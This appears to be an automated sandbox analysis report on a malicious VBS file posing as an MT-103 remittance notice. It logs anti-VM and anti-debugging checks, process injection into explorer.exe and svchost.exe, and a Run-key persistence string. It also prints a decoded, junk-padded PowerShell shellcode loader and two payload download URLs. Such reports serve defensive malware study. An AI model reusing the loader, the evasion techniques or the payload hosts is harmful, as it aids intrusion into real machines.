Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.BULKWHATSAPPSENDER.IN/BIN_FLDFMMV154.BINHTTPS://MADECOSMETICS.STORE/BIN_FLDFMMV154.BIN

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002A19904 second address: 0000000002A1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002A19B7E second address: 0000000002A19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3427			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 862			Jump to behavior

Source: powershell.exe, 00000004.00000003.527285571.0000000005E1C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRT
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000018.00000000.692920243.000000000640C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000018.00000000.692920243.000000000640C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000001.00000003.360714915.0000020FF7DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\A
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: powershell.exe, 00000004.00000002.670508477.0000000005B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #AIRED Sengelej Vendeta8 TEISTE Foelelsesm9 antityro TILS BLGFRU Bydef5 Mili5 Appos softfontet alko nonmarket Modis Mois Unveiled Unemac garblesf teena SHUTTLE Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Ofayve1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);}"@#Hutu7 garan dysch UNUNI Stor OVERIN liftma Electrodi Irriteret4 Boninite7 ecdysonan shar Karantnest brutto antraci Fyrme Laudruptri6 despotiz Tempelk Retssik demoudgave TACTU Obju LUDICROUSC stum Unpl Outsho8 nonpos Talehm Prote2 Test-Path "jobnavn" Test-Path "DRON" $Ofayve3=0;$Ofayve9=1048576;$Ofayve8=[Ofayve1]::NtAllocateVirtualMemory(-1,[ref]$Ofayve3,0,[ref]$Ofayve9,12288,64)#aishahska whamplave Studi7 Allegre8 Particular3 Savag3 ankomstr BYGNINGSSN Speede Vinhs2 Undere8 Epuralbial SUBTEST Degra Bemean8 PRSI Soldaterhj Prostituti1 utnkel Acreages7 FORD UNSOLEM OCCUPI ACCOUT KULTU Forhaile9 pla
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #AIRED Sengelej Vendeta8 TEISTE Foelelsesm9 antityro TILS BLGFRU Bydef5 Mili5 Appos softfontet alko nonmarket Modis Mois Unveiled Unemac garblesf teena SHUTTLE Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Ofayve1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);}"@#Hutu7 garan dysch UNUNI Stor OVERIN liftma Electrodi Irriteret4 Boninite7 ecdysonan shar Karantnest brutto antraci Fyrme Laudruptri6 despotiz Tempelk Retssik demoudgave TACTU Obju LUDICROUSC stum Unpl Outsho8 nonpos Talehm Prote2 Test-Path "jobnavn" Test-Path "DRON" $Ofayve3=0;$Ofayve9=1048576;$Ofayve8=[Ofayve1]::NtAllocateVirtualMemory(-1,[ref]$Ofayve3,0,[ref]$Ofayve9,12288,64)#aishahska whamplave Studi7 Allegre8 Particular3 Savag3 ankomstr BYGNINGSSN Speede Vinhs2 Undere8 Epuralbial SUBTEST Degra Bemean8 PRSI Soldaterhj Prostituti1 utnkel Acreages7 FORD UNSOLEM OCCUPI ACCOUT KULTU Forhaile9 pla			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3440			Jump to behavior

Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.679029461.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.707977610.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.759848257.0000000004F80000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.666851055.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.756579191.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687801292.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.704619524.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Windows Analysis Report Remittance Information (MT-103).vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Remittance Information (MT-103).vbs

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
